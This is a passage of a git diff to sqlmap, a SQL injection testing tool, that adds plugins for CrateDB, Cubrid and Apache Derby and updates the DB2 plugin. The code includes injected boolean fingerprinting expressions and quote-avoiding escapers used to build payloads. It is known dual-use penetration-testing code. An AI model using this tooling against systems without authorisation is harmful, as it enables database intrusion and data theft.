DBMS", kb.bannerFp) + + if dbmsOsFp: + value += "%s\n" % dbmsOsFp + + value += "back-end DBMS: " + + if not conf.extensiveFp: + value += DBMS.CRATEDB + return value + + actVer = Format.getDbms() + blank = " " * 15 + value += "active fingerprint: %s" % actVer + + if kb.bannerFp: + banVer = kb.bannerFp.get("dbmsVersion") + + if banVer: + banVer = Format.getDbms([banVer]) + value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) + + htmlErrorFp = Format.getErrorParsedDBMSes() + + if htmlErrorFp: + value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) + + return value + + def checkDbms(self): + if not conf.extensiveFp and Backend.isDbmsWithin(CRATEDB_ALIASES): + setDbms(DBMS.CRATEDB) + + self.getBanner() + + return True + + infoMsg = "testing %s" % DBMS.CRATEDB + logger.info(infoMsg) + + result = inject.checkBooleanExpression("IGNORE3VL(NULL IS NULL)") + + if result: + infoMsg = "confirming %s" % DBMS.CRATEDB + logger.info(infoMsg) + + result = inject.checkBooleanExpression("1~1") + + if not result: + warnMsg = "the back-end DBMS is not %s" % DBMS.CRATEDB + logger.warning(warnMsg) + + return False + + setDbms(DBMS.CRATEDB) + + self.getBanner() + + return True + else: + warnMsg = "the back-end DBMS is not %s" % DBMS.CRATEDB + logger.warning(warnMsg) + + return False diff --git a/plugins/dbms/cratedb/syntax.py b/plugins/dbms/cratedb/syntax.py new file mode 100644 index 00000000000..17a0a02c257 --- /dev/null +++ b/plugins/dbms/cratedb/syntax.py @@ -0,0 +1,18 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from plugins.generic.syntax import Syntax as GenericSyntax + +class Syntax(GenericSyntax): + @staticmethod + def escape(expression, quote=True): + """ + >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT 'abcdefgh' FROM foobar" + True + """ + + return expression diff --git a/plugins/dbms/cratedb/takeover.py b/plugins/dbms/cratedb/takeover.py new file mode 100644 index 00000000000..0e8b86c004c --- /dev/null +++ b/plugins/dbms/cratedb/takeover.py @@ -0,0 +1,28 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.exception import SqlmapUnsupportedFeatureException +from plugins.generic.takeover import Takeover as GenericTakeover + +class Takeover(GenericTakeover): + def osCmd(self): + errMsg = "on CrateDB it is not possible to execute commands" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osShell(self): + errMsg = "on CrateDB it is not possible to execute commands" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osPwn(self): + errMsg = "on CrateDB it is not possible to establish an " + errMsg += "out-of-band connection" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osSmb(self): + errMsg = "on CrateDB it is not possible to establish an " + errMsg += "out-of-band connection" + raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/cubrid/__init__.py b/plugins/dbms/cubrid/__init__.py new file mode 100644 index 00000000000..d5aedaf3c04 --- /dev/null +++ b/plugins/dbms/cubrid/__init__.py @@ -0,0 +1,30 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.enums import DBMS +from lib.core.settings import CUBRID_SYSTEM_DBS +from lib.core.unescaper import unescaper + +from 
plugins.dbms.cubrid.enumeration import Enumeration +from plugins.dbms.cubrid.filesystem import Filesystem +from plugins.dbms.cubrid.fingerprint import Fingerprint +from plugins.dbms.cubrid.syntax import Syntax +from plugins.dbms.cubrid.takeover import Takeover +from plugins.generic.misc import Miscellaneous + +class CubridMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover): + """ + This class defines Cubrid methods + """ + + def __init__(self): + self.excludeDbsList = CUBRID_SYSTEM_DBS + + for cls in self.__class__.__bases__: + cls.__init__(self) + + unescaper[DBMS.CUBRID] = Syntax.escape diff --git a/plugins/dbms/cubrid/connector.py b/plugins/dbms/cubrid/connector.py new file mode 100644 index 00000000000..76aa9ea390c --- /dev/null +++ b/plugins/dbms/cubrid/connector.py @@ -0,0 +1,59 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +try: + import CUBRIDdb +except: + pass + +import logging + +from lib.core.common import getSafeExString +from lib.core.data import conf +from lib.core.data import logger +from lib.core.exception import SqlmapConnectionException +from plugins.generic.connector import Connector as GenericConnector + +class Connector(GenericConnector): + """ + Homepage: https://github.com/CUBRID/cubrid-python + User guide: https://github.com/CUBRID/cubrid-python/blob/develop/README.md + API: https://www.python.org/dev/peps/pep-0249/ + License: BSD License + """ + + def connect(self): + self.initConnection() + + try: + self.connector = CUBRIDdb.connect(hostname=self.hostname, username=self.user, password=self.password, database=self.db, port=self.port, connect_timeout=conf.timeout) + except CUBRIDdb.DatabaseError as ex: + raise SqlmapConnectionException(getSafeExString(ex)) + + self.initCursor() + self.printConnected() + + def fetchall(self): + try: + return self.cursor.fetchall() + except CUBRIDdb.DatabaseError as ex: + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % getSafeExString(ex)) + return None + + def execute(self, query): + try: + self.cursor.execute(query) + except CUBRIDdb.DatabaseError as ex: + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % getSafeExString(ex)) + except CUBRIDdb.Error as ex: + raise SqlmapConnectionException(getSafeExString(ex)) + + self.connector.commit() + + def select(self, query): + self.execute(query) + return self.fetchall() diff --git a/plugins/dbms/cubrid/enumeration.py b/plugins/dbms/cubrid/enumeration.py new file mode 100644 index 00000000000..142b170108a --- /dev/null +++ b/plugins/dbms/cubrid/enumeration.py @@ -0,0 +1,32 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.data import logger +from plugins.generic.enumeration import Enumeration as GenericEnumeration + +class Enumeration(GenericEnumeration): + def getPasswordHashes(self): + warnMsg = "on Cubrid it is not possible to enumerate password hashes" + logger.warning(warnMsg) + + return {} + + def getStatements(self): + warnMsg = "on Cubrid it is not possible to enumerate the SQL statements" + logger.warning(warnMsg) + + return [] + + def getRoles(self, *args, **kwargs): + warnMsg = "on Cubrid it is not possible to enumerate the user roles" + logger.warning(warnMsg) + + return {} + + def getHostname(self): + warnMsg = "on Cubrid it is not possible to enumerate the hostname" + 
logger.warning(warnMsg) diff --git a/plugins/dbms/cubrid/filesystem.py b/plugins/dbms/cubrid/filesystem.py new file mode 100644 index 00000000000..2e61d83c07c --- /dev/null +++ b/plugins/dbms/cubrid/filesystem.py @@ -0,0 +1,11 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from plugins.generic.filesystem import Filesystem as GenericFilesystem + +class Filesystem(GenericFilesystem): + pass diff --git a/plugins/dbms/cubrid/fingerprint.py b/plugins/dbms/cubrid/fingerprint.py new file mode 100644 index 00000000000..9d1a16c151d --- /dev/null +++ b/plugins/dbms/cubrid/fingerprint.py @@ -0,0 +1,94 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.common import Backend +from lib.core.common import Format +from lib.core.data import conf +from lib.core.data import kb +from lib.core.data import logger +from lib.core.enums import DBMS +from lib.core.session import setDbms +from lib.core.settings import CUBRID_ALIASES +from lib.request import inject +from plugins.generic.fingerprint import Fingerprint as GenericFingerprint + +class Fingerprint(GenericFingerprint): + def __init__(self): + GenericFingerprint.__init__(self, DBMS.CUBRID) + + def getFingerprint(self): + value = "" + wsOsFp = Format.getOs("web server", kb.headersFp) + + if wsOsFp: + value += "%s\n" % wsOsFp + + if kb.data.banner: + dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp) + + if dbmsOsFp: + value += "%s\n" % dbmsOsFp + + value += "back-end DBMS: " + + if not conf.extensiveFp: + value += DBMS.CUBRID + return value + + actVer = Format.getDbms() + blank = " " * 15 + value += "active fingerprint: %s" % actVer + + if kb.bannerFp: + banVer = kb.bannerFp.get("dbmsVersion") + + if banVer: + banVer = Format.getDbms([banVer]) + value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) + + htmlErrorFp = Format.getErrorParsedDBMSes() + + if htmlErrorFp: + value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) + + return value + + def checkDbms(self): + if not conf.extensiveFp and Backend.isDbmsWithin(CUBRID_ALIASES): + setDbms(DBMS.CUBRID) + + self.getBanner() + + return True + + infoMsg = "testing %s" % DBMS.CUBRID + logger.info(infoMsg) + + result = inject.checkBooleanExpression("{} SUBSETEQ (CAST ({} AS SET))") + + if result: + infoMsg = "confirming %s" % DBMS.CUBRID + logger.info(infoMsg) + + result = inject.checkBooleanExpression("DRAND()<2") + + if not result: + warnMsg = "the back-end DBMS is not %s" % DBMS.CUBRID + logger.warning(warnMsg) + + return False + + setDbms(DBMS.CUBRID) + + self.getBanner() + + return True + else: + warnMsg = "the back-end DBMS is not %s" % DBMS.CUBRID + logger.warning(warnMsg) + + return False diff --git a/plugins/dbms/cubrid/syntax.py b/plugins/dbms/cubrid/syntax.py new file mode 100644 index 00000000000..070abcd25b3 --- /dev/null +++ b/plugins/dbms/cubrid/syntax.py @@ -0,0 +1,23 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.convert import getOrds +from plugins.generic.syntax import Syntax as GenericSyntax + +class Syntax(GenericSyntax): + @staticmethod + def escape(expression, quote=True): + """ + >>> from lib.core.common import Backend + >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT 
CHR(97)||CHR(98)||CHR(99)||CHR(100)||CHR(101)||CHR(102)||CHR(103)||CHR(104) FROM foobar" + True + """ + + def escaper(value): + return "||".join("CHR(%d)" % _ for _ in getOrds(value)) + + return Syntax._escape(expression, quote, escaper) diff --git a/plugins/dbms/cubrid/takeover.py b/plugins/dbms/cubrid/takeover.py new file mode 100644 index 00000000000..cb140d6c9c5 --- /dev/null +++ b/plugins/dbms/cubrid/takeover.py @@ -0,0 +1,28 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.exception import SqlmapUnsupportedFeatureException +from plugins.generic.takeover import Takeover as GenericTakeover + +class Takeover(GenericTakeover): + def osCmd(self): + errMsg = "on Cubrid it is not possible to execute commands" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osShell(self): + errMsg = "on Cubrid it is not possible to execute commands" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osPwn(self): + errMsg = "on Cubrid it is not possible to establish an " + errMsg += "out-of-band connection" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osSmb(self): + errMsg = "on Cubrid it is not possible to establish an " + errMsg += "out-of-band connection" + raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/db2/__init__.py b/plugins/dbms/db2/__init__.py index 61494a9cdd9..9b70ae438ab 100644 --- a/plugins/dbms/db2/__init__.py +++ b/plugins/dbms/db2/__init__.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.enums import DBMS @@ -24,11 +24,7 @@ class DB2Map(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeov def __init__(self): self.excludeDbsList = DB2_SYSTEM_DBS - Syntax.__init__(self) - Fingerprint.__init__(self) - Enumeration.__init__(self) - Filesystem.__init__(self) - Miscellaneous.__init__(self) - Takeover.__init__(self) + for cls in self.__class__.__bases__: + cls.__init__(self) unescaper[DBMS.DB2] = Syntax.escape diff --git a/plugins/dbms/db2/connector.py b/plugins/dbms/db2/connector.py index 797593178ed..0a8e96b7a34 100644 --- a/plugins/dbms/db2/connector.py +++ b/plugins/dbms/db2/connector.py @@ -1,17 +1,18 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ try: import ibm_db_dbi -except ImportError: +except: pass import logging +from lib.core.common import getSafeExString from lib.core.data import conf from lib.core.data import logger from lib.core.exception import SqlmapConnectionException @@ -19,42 +20,38 @@ class Connector(GenericConnector): """ - Homepage: http://code.google.com/p/ibm-db/ - User guide: http://code.google.com/p/ibm-db/wiki/README - API: http://www.python.org/dev/peps/pep-0249/ + Homepage: https://github.com/ibmdb/python-ibmdb + User guide: https://github.com/ibmdb/python-ibmdb/wiki/README + API: https://www.python.org/dev/peps/pep-0249/ License: Apache License 2.0 """ - def __init__(self): - GenericConnector.__init__(self) - def connect(self): self.initConnection() try: database = "DRIVER={IBM DB2 ODBC 
DRIVER};DATABASE=%s;HOSTNAME=%s;PORT=%s;PROTOCOL=TCPIP;" % (self.db, self.hostname, self.port) self.connector = ibm_db_dbi.connect(database, self.user, self.password) - except ibm_db_dbi.OperationalError, msg: - raise SqlmapConnectionException(msg) - + except ibm_db_dbi.OperationalError as ex: + raise SqlmapConnectionException(getSafeExString(ex)) self.initCursor() - self.connected() + self.printConnected() def fetchall(self): try: return self.cursor.fetchall() - except ibm_db_dbi.ProgrammingError, msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1]) + except ibm_db_dbi.ProgrammingError as ex: + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) '%s'" % getSafeExString(ex)) return None def execute(self, query): try: self.cursor.execute(query) - except (ibm_db_dbi.OperationalError, ibm_db_dbi.ProgrammingError), msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1]) - except ibm_db_dbi.InternalError, msg: - raise SqlmapConnectionException(msg[1]) + except (ibm_db_dbi.OperationalError, ibm_db_dbi.ProgrammingError) as ex: + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) '%s'" % getSafeExString(ex)) + except ibm_db_dbi.InternalError as ex: + raise SqlmapConnectionException(getSafeExString(ex)) self.connector.commit() diff --git a/plugins/dbms/db2/enumeration.py b/plugins/dbms/db2/enumeration.py index a7d78326381..3a6c3599e35 100644 --- a/plugins/dbms/db2/enumeration.py +++ b/plugins/dbms/db2/enumeration.py @@ -1,21 +1,22 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ - from lib.core.data import logger from plugins.generic.enumeration import Enumeration as GenericEnumeration class Enumeration(GenericEnumeration): - def __init__(self): - GenericEnumeration.__init__(self) - def getPasswordHashes(self): - warnMsg = "on DB2 it is not possible to list password hashes" - logger.warn(warnMsg) + warnMsg = "on IBM DB2 it is not possible to enumerate password hashes" + logger.warning(warnMsg) return {} + def getStatements(self): + warnMsg = "on IBM DB2 it is not possible to enumerate the SQL statements" + logger.warning(warnMsg) + + return [] diff --git a/plugins/dbms/db2/filesystem.py b/plugins/dbms/db2/filesystem.py index 8df147edb8b..2e61d83c07c 100644 --- a/plugins/dbms/db2/filesystem.py +++ b/plugins/dbms/db2/filesystem.py @@ -1,12 +1,11 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from plugins.generic.filesystem import Filesystem as GenericFilesystem class Filesystem(GenericFilesystem): - def __init__(self): - GenericFilesystem.__init__(self) + pass diff --git a/plugins/dbms/db2/fingerprint.py b/plugins/dbms/db2/fingerprint.py index 997b319028e..aa12d2ed11a 100644 --- a/plugins/dbms/db2/fingerprint.py +++ b/plugins/dbms/db2/fingerprint.py @@ -1,14 +1,13 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ - from lib.core.common import Backend from 
lib.core.common import Format -from lib.core.common import randomInt +from lib.core.compat import xrange from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger @@ -65,14 +64,16 @@ def getFingerprint(self): value += DBMS.DB2 return value - actVer = Format.getDbms() - blank = " " * 15 - value += "active fingerprint: %s" % actVer + actVer = Format.getDbms() + blank = " " * 15 + value += "active fingerprint: %s" % actVer if kb.bannerFp: - banVer = kb.bannerFp["dbmsVersion"] if 'dbmsVersion' in kb.bannerFp else None - banVer = Format.getDbms([banVer]) - value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) + banVer = kb.bannerFp.get("dbmsVersion") + + if banVer: + banVer = Format.getDbms([banVer]) + value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) htmlErrorFp = Format.getErrorParsedDBMSes() @@ -82,7 +83,7 @@ def getFingerprint(self): return value def checkDbms(self): - if not conf.extensiveFp and (Backend.isDbmsWithin(DB2_ALIASES) or conf.dbms in DB2_ALIASES): + if not conf.extensiveFp and Backend.isDbmsWithin(DB2_ALIASES): setDbms(DBMS.DB2) return True @@ -90,23 +91,31 @@ def checkDbms(self): logMsg = "testing %s" % DBMS.DB2 logger.info(logMsg) - randInt = randomInt() - result = inject.checkBooleanExpression("%d=(SELECT %d FROM SYSIBM.SYSDUMMY1)" % (randInt, randInt)) + result = inject.checkBooleanExpression("[RANDNUM]=(SELECT [RANDNUM] FROM SYSIBM.SYSDUMMY1)") if result: logMsg = "confirming %s" % DBMS.DB2 logger.info(logMsg) - version = self._versionCheck() + result = inject.checkBooleanExpression("JULIAN_DAY(CURRENT DATE) IS NOT NULL") + if not result: + warnMsg = "the back-end DBMS is not %s" % DBMS.DB2 + logger.warning(warnMsg) + + return False + + version = self._versionCheck() if version: Backend.setVersion(version) setDbms("%s %s" % (DBMS.DB2, Backend.getVersion())) + else: + setDbms(DBMS.DB2) return True else: warnMsg = "the back-end DBMS is not %s" % DBMS.DB2 - logger.warn(warnMsg) + logger.warning(warnMsg) return False @@ -129,12 +138,14 @@ def checkDbmsOs(self, detailed=False): infoMsg = "the back-end DBMS operating system is %s" % Backend.getOs() if result: - versions = { "2003": ("5.2", (2, 1)), + versions = { + "2003": ("5.2", (2, 1)), "2008": ("7.0", (1,)), "2000": ("5.0", (4, 3, 2, 1)), "7": ("6.1", (1, 0)), "XP": ("5.1", (2, 1)), - "NT": ("4.0", (6, 5, 4, 3, 2, 1)) } + "NT": ("4.0", (6, 5, 4, 3, 2, 1)) + } # Get back-end DBMS underlying operating system version for version, data in versions.items(): diff --git a/plugins/dbms/db2/syntax.py b/plugins/dbms/db2/syntax.py index 9a818633656..7ba5c8b9f38 100644 --- a/plugins/dbms/db2/syntax.py +++ b/plugins/dbms/db2/syntax.py @@ -1,19 +1,22 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +from lib.core.convert import getOrds from plugins.generic.syntax import Syntax as GenericSyntax class Syntax(GenericSyntax): - def __init__(self): - GenericSyntax.__init__(self) - @staticmethod def escape(expression, quote=True): + """ + >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT CHR(97)||CHR(98)||CHR(99)||CHR(100)||CHR(101)||CHR(102)||CHR(103)||CHR(104) FROM foobar" + True + """ + def escaper(value): - return "||".join("CHR(%d)" % ord(_) for _ in value) + return "||".join("CHR(%d)" % _ for _ in getOrds(value)) return Syntax._escape(expression, quote, escaper) 
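The DB2, Cache, Cubrid and Firebird syntax plugins in this patch all follow the same pattern: a small escaper callback turns every quoted string literal into a quote-free CHR()/CHAR()/ASCII_CHAR() concatenation, and the shared Syntax._escape helper applies it across the expression. A minimal standalone sketch of that idea (not sqlmap's actual Syntax._escape; the regex-based replacement below is an assumption kept simple for illustration):

    # Illustrative sketch only -- sqlmap's real _escape handles more cases
    # (escaped quotes, hex literals, etc.); this shows the core transformation.
    import re

    def escape_quoted_literals(expression, escaper):
        # Replace each single-quoted literal (e.g. 'abc') with whatever the
        # DBMS-specific escaper callback produces for its contents.
        def repl(match):
            return escaper(match.group(1))
        return re.sub(r"'([^']+)'", repl, expression)

    def db2_escaper(value):
        # Same shape as the DB2/Cubrid escapers in the diff: CHR(<ord>) pieces
        # joined with the || concatenation operator.
        return "||".join("CHR(%d)" % ord(c) for c in value)

    print(escape_quoted_literals("SELECT 'abc' FROM foobar", db2_escaper))
    # SELECT CHR(97)||CHR(98)||CHR(99) FROM foobar

The payoff is that generated payloads never need a literal quote character, which is what the per-plugin doctests above are asserting.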
diff --git a/plugins/dbms/db2/takeover.py b/plugins/dbms/db2/takeover.py index 1c1b36d3ffe..7c19fd8799c 100644 --- a/plugins/dbms/db2/takeover.py +++ b/plugins/dbms/db2/takeover.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from plugins.generic.takeover import Takeover as GenericTakeover diff --git a/plugins/dbms/derby/__init__.py b/plugins/dbms/derby/__init__.py new file mode 100644 index 00000000000..2b4f3104e87 --- /dev/null +++ b/plugins/dbms/derby/__init__.py @@ -0,0 +1,30 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.enums import DBMS +from lib.core.settings import DERBY_SYSTEM_DBS +from lib.core.unescaper import unescaper + +from plugins.dbms.derby.enumeration import Enumeration +from plugins.dbms.derby.filesystem import Filesystem +from plugins.dbms.derby.fingerprint import Fingerprint +from plugins.dbms.derby.syntax import Syntax +from plugins.dbms.derby.takeover import Takeover +from plugins.generic.misc import Miscellaneous + +class DerbyMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover): + """ + This class defines Apache Derby methods + """ + + def __init__(self): + self.excludeDbsList = DERBY_SYSTEM_DBS + + for cls in self.__class__.__bases__: + cls.__init__(self) + + unescaper[DBMS.DERBY] = Syntax.escape diff --git a/plugins/dbms/derby/connector.py b/plugins/dbms/derby/connector.py new file mode 100644 index 00000000000..7be45f7412b --- /dev/null +++ b/plugins/dbms/derby/connector.py @@ -0,0 +1,62 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +try: + import drda +except: + pass + +import logging + +from lib.core.common import getSafeExString +from lib.core.data import conf +from lib.core.data import logger +from lib.core.exception import SqlmapConnectionException +from plugins.generic.connector import Connector as GenericConnector + +class Connector(GenericConnector): + """ + Homepage: https://github.com/nakagami/pydrda/ + User guide: https://github.com/nakagami/pydrda/blob/master/README.rst + API: https://www.python.org/dev/peps/pep-0249/ + License: MIT + """ + + def connect(self): + self.initConnection() + + try: + self.connector = drda.connect(host=self.hostname, database=self.db, port=self.port) + except drda.OperationalError as ex: + raise SqlmapConnectionException(getSafeExString(ex)) + + self.initCursor() + self.printConnected() + + def fetchall(self): + try: + return self.cursor.fetchall() + except drda.ProgrammingError as ex: + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % getSafeExString(ex)) + return None + + def execute(self, query): + try: + self.cursor.execute(query) + except (drda.OperationalError, drda.ProgrammingError) as ex: + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % getSafeExString(ex)) + except drda.InternalError as ex: + raise SqlmapConnectionException(getSafeExString(ex)) + + try: + self.connector.commit() + except drda.OperationalError: + pass + + def select(self, query): + self.execute(query) + return self.fetchall() diff --git a/plugins/dbms/derby/enumeration.py b/plugins/dbms/derby/enumeration.py new file mode 
100644 index 00000000000..286d20b6c93 --- /dev/null +++ b/plugins/dbms/derby/enumeration.py @@ -0,0 +1,43 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.common import singleTimeWarnMessage +from lib.core.data import logger +from plugins.generic.enumeration import Enumeration as GenericEnumeration + +class Enumeration(GenericEnumeration): + def getPasswordHashes(self): + warnMsg = "on Apache Derby it is not possible to enumerate password hashes" + logger.warning(warnMsg) + + return {} + + def getStatements(self): + warnMsg = "on Apache Derby it is not possible to enumerate the SQL statements" + logger.warning(warnMsg) + + return [] + + def getPrivileges(self, *args, **kwargs): + warnMsg = "on Apache Derby it is not possible to enumerate the user privileges" + logger.warning(warnMsg) + + return {} + + def getRoles(self, *args, **kwargs): + warnMsg = "on Apache Derby it is not possible to enumerate the user roles" + logger.warning(warnMsg) + + return {} + + def getHostname(self): + warnMsg = "on Apache Derby it is not possible to enumerate the hostname" + logger.warning(warnMsg) + + def getBanner(self): + warnMsg = "on Apache Derby it is not possible to enumerate the banner" + singleTimeWarnMessage(warnMsg) diff --git a/plugins/dbms/derby/filesystem.py b/plugins/dbms/derby/filesystem.py new file mode 100644 index 00000000000..2e61d83c07c --- /dev/null +++ b/plugins/dbms/derby/filesystem.py @@ -0,0 +1,11 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from plugins.generic.filesystem import Filesystem as GenericFilesystem + +class Filesystem(GenericFilesystem): + pass diff --git a/plugins/dbms/derby/fingerprint.py b/plugins/dbms/derby/fingerprint.py new file mode 100644 index 00000000000..76d67e89605 --- /dev/null +++ b/plugins/dbms/derby/fingerprint.py @@ -0,0 +1,94 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.common import Backend +from lib.core.common import Format +from lib.core.data import conf +from lib.core.data import kb +from lib.core.data import logger +from lib.core.enums import DBMS +from lib.core.session import setDbms +from lib.core.settings import DERBY_ALIASES +from lib.request import inject +from plugins.generic.fingerprint import Fingerprint as GenericFingerprint + +class Fingerprint(GenericFingerprint): + def __init__(self): + GenericFingerprint.__init__(self, DBMS.DERBY) + + def getFingerprint(self): + value = "" + wsOsFp = Format.getOs("web server", kb.headersFp) + + if wsOsFp: + value += "%s\n" % wsOsFp + + if kb.data.banner: + dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp) + + if dbmsOsFp: + value += "%s\n" % dbmsOsFp + + value += "back-end DBMS: " + + if not conf.extensiveFp: + value += DBMS.DERBY + return value + + actVer = Format.getDbms() + blank = " " * 15 + value += "active fingerprint: %s" % actVer + + if kb.bannerFp: + banVer = kb.bannerFp.get("dbmsVersion") + + if banVer: + banVer = Format.getDbms([banVer]) + value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) + + htmlErrorFp = Format.getErrorParsedDBMSes() + + if htmlErrorFp: + value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) + + return value + + def checkDbms(self): + if not conf.extensiveFp and Backend.isDbmsWithin(DERBY_ALIASES): 
+ setDbms(DBMS.DERBY) + + self.getBanner() + + return True + + infoMsg = "testing %s" % DBMS.DERBY + logger.info(infoMsg) + + result = inject.checkBooleanExpression("[RANDNUM]=(SELECT [RANDNUM] FROM SYSIBM.SYSDUMMY1 OFFSET 0 ROWS FETCH FIRST 1 ROW ONLY)") + + if result: + infoMsg = "confirming %s" % DBMS.DERBY + logger.info(infoMsg) + + result = inject.checkBooleanExpression("(SELECT CURRENT SCHEMA FROM SYSIBM.SYSDUMMY1) IS NOT NULL") + + if not result: + warnMsg = "the back-end DBMS is not %s" % DBMS.DERBY + logger.warning(warnMsg) + + return False + + setDbms(DBMS.DERBY) + + self.getBanner() + + return True + else: + warnMsg = "the back-end DBMS is not %s" % DBMS.DERBY + logger.warning(warnMsg) + + return False diff --git a/plugins/dbms/derby/syntax.py b/plugins/dbms/derby/syntax.py new file mode 100644 index 00000000000..17a0a02c257 --- /dev/null +++ b/plugins/dbms/derby/syntax.py @@ -0,0 +1,18 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from plugins.generic.syntax import Syntax as GenericSyntax + +class Syntax(GenericSyntax): + @staticmethod + def escape(expression, quote=True): + """ + >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT 'abcdefgh' FROM foobar" + True + """ + + return expression diff --git a/plugins/dbms/derby/takeover.py b/plugins/dbms/derby/takeover.py new file mode 100644 index 00000000000..c4c4ea098ce --- /dev/null +++ b/plugins/dbms/derby/takeover.py @@ -0,0 +1,28 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.exception import SqlmapUnsupportedFeatureException +from plugins.generic.takeover import Takeover as GenericTakeover + +class Takeover(GenericTakeover): + def osCmd(self): + errMsg = "on Apache Derby it is not possible to execute commands" + raise 